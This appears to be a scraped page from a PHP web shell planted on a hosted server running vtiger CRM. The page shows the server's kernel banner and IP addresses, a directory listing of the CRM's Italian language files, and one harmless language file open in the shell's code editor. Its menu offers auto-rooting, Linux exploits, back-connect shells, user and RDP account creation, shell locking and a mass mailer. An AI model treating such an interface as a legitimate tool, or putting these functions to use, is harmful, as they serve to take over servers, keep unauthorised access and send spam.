Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.216.88
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
crmleta /
languages /
it_it /
[ HOME SHELL ]
Name
Size
Permission
Action
Settings
[ DIR ]
drwxr-xr-x
custom
[ DIR ]
drwx---r-x
Accounts.php
3.35
KB
-rw-r--r--
Assets.php
1.7
KB
-rw-r--r--
Calendar.php
11.7
KB
-rw-r--r--
Campaigns.php
3.61
KB
-rw-r--r--
Contacts.php
3.54
KB
-rw-r--r--
Documents.php
5.63
KB
-rw-r--r--
EmailTemplates.php
1.57
KB
-rw-r--r--
Emails.php
3.36
KB
-rw-r--r--
Events.php
5.15
KB
-rw-r--r--
Faq.php
1.54
KB
-rw-r--r--
Google.php
3.71
KB
-rw-r--r--
HelpDesk.php
5.29
KB
-rw-r--r--
Home.php
1.86
KB
-rw-r--r--
Import.php
6.46
KB
-rw-r--r--
Invoice.php
2.38
KB
-rw-r--r--
Leads.php
3.47
KB
-rw-r--r--
MailManager.php
10.33
KB
-rw-r--r--
Migration.php
1.89
KB
-rw-r--r--
ModComments.php
1.21
KB
-rw-r--r--
PBXManager.php
1.08
KB
-rw-r--r--
PDFMaker.php
28.94
KB
-rw-r--r--
Portal.php
1.74
KB
-rw-r--r--
Potentials.php
3.63
KB
-rw-r--r--
PriceBooks.php
1.15
KB
-rw-r--r--
Products.php
5.8
KB
-rw-r--r--
Project.php
4.2
KB
-rw-r--r--
ProjectMilestone.php
1.29
KB
-rw-r--r--
ProjectTask.php
1.81
KB
-rw-r--r--
PurchaseOrder.php
3.42
KB
-rw-r--r--
Quotes.php
1.84
KB
-rw-r--r--
RecycleBin.php
1.75
KB
-rw-r--r--
Reports.php
13.36
KB
-rw-r--r--
Rss.php
1.25
KB
-rw-r--r--
SMSNotifier.php
1.38
KB
-rw-r--r--
SalesOrder.php
2.71
KB
-rw-r--r--
ServiceContracts.php
2.37
KB
-rw-r--r--
Services.php
2.01
KB
-rw-r--r--
Users.php
17.23
KB
-rw-r--r--
VTENotepad.php
724
B
-rw-r--r--
Vendors.php
2.29
KB
-rw-r--r--
Vtiger.php
98.5
KB
-rw-r--r--
Webservices.php
1.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SMSNotifier.php
<?php /*+********************************************************************************** * The contents of this file are subject to the vtiger CRM Public License Version 1.0 * ("License"); You may not use this file except in compliance with the License * The Original Code is: vtiger CRM Open Source * The Initial Developer of the Original Code is vtiger. * Portions created by vtiger are Copyright (C) vtiger. * All Rights Reserved. ************************************************************************************/ $languageStrings = array( 'LBL_SEND_SMS_TO_SELECTED_NUMBERS' => 'Send SMS to the selected numbers', 'LBL_STEP_1' => 'Step 1' , 'LBL_STEP_2' => 'Step 2' , 'LBL_SELECT_THE_PHONE_NUMBER_FIELDS_TO_SEND' => 'Select the phone number fields to send', 'LBL_TYPE_THE_MESSAGE' => 'Type the message' , 'LBL_WRITE_YOUR_MESSAGE_HERE' => 'write your message here' , 'LBL_ADD_MORE_FIELDS' => 'Add more fields' , 'LBL_SERVER_CONFIG' => 'Server Configuration' , 'LBL_CHECK_STATUS' => 'Check Status' , 'message' => 'Message' , 'LBL_SMSNOTIFIER_INFORMATION' => 'SMS Information' , 'SINGLE_SMSNotifier' => 'SMS Notifier' , // TODO: Review );
Close